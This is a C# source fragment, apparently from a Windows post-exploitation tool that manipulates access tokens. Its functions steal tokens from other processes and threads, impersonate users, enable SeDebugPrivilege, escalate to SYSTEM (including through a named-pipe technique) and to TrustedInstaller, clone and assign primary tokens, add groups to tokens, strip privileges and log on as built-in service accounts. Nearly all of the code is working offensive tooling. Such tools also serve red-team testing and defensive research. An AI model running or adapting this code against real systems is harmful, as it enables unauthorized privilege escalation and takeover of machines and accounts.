////////////////////////////////////////////////////////////////////////////////
// Enables, Disables, or Removes a privilege from a Token
////////////////////////////////////////////////////////////////////////////////
private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt.TokenPrivileges attribute)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote && !cLP.Impersonation && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else if (cLP.Remote && cLP.Impersonation)
{
t.ListThreads(cLP.ProcessID);
t.SetThreadTokenPrivilege(cLP.Privilege, attribute);
}
else if (!cLP.Remote && cLP.Impersonation)
{
t.ListThreads(Process.GetCurrentProcess().Id);
t.SetThreadTokenPrivilege(cLP.Privilege, attribute);
}
else
{
t.SetWorkingTokenToSelf();
}
t.SetTokenPrivilege(cLP.Privilege, attribute);
}
}
////////////////////////////////////////////////////////////////////////////////
// Starts Windows Module Installer and impersonates or starts a process with
// the cloned token. There are better ways of doing this net .O
////////////////////////////////////////////////////////////////////////////////
private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
{
bool exists, enabled;
TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
if (exists)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
t.SetWorkingTokenToSelf();
if (!enabled)
{
t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
}
if (string.IsNullOrEmpty(cLP.Command))
{
t.GetTrustedInstaller();
}
else
{
t.GetTrustedInstaller(cLP.CommandAndArgs);
}
}
}
else
{
Console.WriteLine("[-] SeDebugPrivilege Is Not Assigned to Token");
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (string.IsNullOrWhiteSpace(cLP.Command))
{
if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else if (0 != cLP.ThreadID && t.OpenThreadToken((uint)cLP.ThreadID, Winnt.TOKEN_ALL_ACCESS))
{
t.SetWorkingTokenToThreadToken();
}
else
{
Console.WriteLine("[-] Process or Thread ID not Specified");
return(false);
}
if (t.ImpersonateUser())
{
return(true);
}
}
else
{
if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
{
return(false);
}
t.SetWorkingTokenToNewToken();
}
else if (0 != cLP.ThreadID && t.OpenThreadToken((uint)cLP.ThreadID, Winnt.TOKEN_ALL_ACCESS))
{
t.SetWorkingTokenToThreadToken();
}
else
{
Console.WriteLine("[-] Process or Thread ID not Specified");
return(false);
}
if (t.StartProcessAsUser(cLP.Command))
{
return(true);
}
}
return(false);
}
}
////////////////////////////////////////////////////////////////////////////////
// Disable and remove all the privileges on a given token
////////////////////////////////////////////////////////////////////////////////
private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote)
{
t.SetWorkingTokenToRemote();
if (!t.OpenProcessToken(cLP.ProcessID))
{
return;
}
}
else
{
t.SetWorkingTokenToSelf();
}
t.DisableAndRemoveAllTokenPrivileges();
}
}
////////////////////////////////////////////////////////////////////////////////
// Impersonates a SYSTEM token or creates a new process with the cloned token
////////////////////////////////////////////////////////////////////////////////
private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
{
bool exists, enabled;
TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
if (exists)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
t.SetWorkingTokenToSelf();
if (!enabled)
{
t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
}
if (string.IsNullOrEmpty(cLP.Command))
{
t.GetSystem();
}
else
{
t.GetSystem(cLP.CommandAndArgs);
}
}
}
else
{
if (string.IsNullOrEmpty(cLP.Command))
{
NamedPipes.GetSystem();
}
else
{
NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
}
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _CloneToken(bool remote, int processID, string command, IntPtr hToken)
{
if (!remote)
{
Console.WriteLine("[-] Unable to identify Process ID");
return;
}
if (!string.IsNullOrEmpty(command))
{
if (!remote)
{
Console.WriteLine("[-] Unable to parse {0}", command);
}
}
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (!t.OpenProcessToken(processID))
{
return;
}
t.SetWorkingTokenToRemote();
if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation))
{
Console.WriteLine("[-] Unable to Duplicate with Delegation, attempting Impersonation");
if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
{
return;
}
}
if (!t.AssignPrimaryToken())
{
return;
}
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _AddGroup(CommandLineParsing cLP, IntPtr hToken)
{
string groups;
if (!cLP.GetData("groups", out groups))
{
return;
}
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else
{
t.SetWorkingTokenToSelf();
}
t.SetTokenGroup(groups, false);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
{
string username;
if (!cLP.GetData("username", out username))
{
return;
}
string domain = ".";
string password = string.Empty;
Winbase.LOGON_TYPE logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_INTERACTIVE;
if (username.Contains('\\') && !username.ToLower().StartsWith("nt service"))
{
string[] split = username.Split('\\').ToArray();
domain = split.FirstOrDefault();
username = split.LastOrDefault();
if (!cLP.GetData("password", out password))
{
return;
}
Console.WriteLine("User Logon");
}
else if (username.Contains('\\') && username.ToLower().StartsWith("nt service"))
{
string[] split = username.Split('\\').ToArray();
username = split.LastOrDefault();
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT SERVICE";
Console.WriteLine("Service Logon");
}
else
{
switch (username.ToLower().Trim())
{
case "localservice":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
case "localsystem":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
case "networkservice":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
default:
cLP.GetData("password", out password);
break;
}
}
using (TokenManipulation t = new TokenManipulation(hToken))
{
string groups;
if (cLP.GetData("groups", out groups))
{
t.LogonUser(domain, username, password, groups, logonType, cLP.Command, cLP.Arguments);
}
else
{
t.LogonUser(domain, username, password, logonType, cLP.Command, cLP.Arguments);
}
}
}
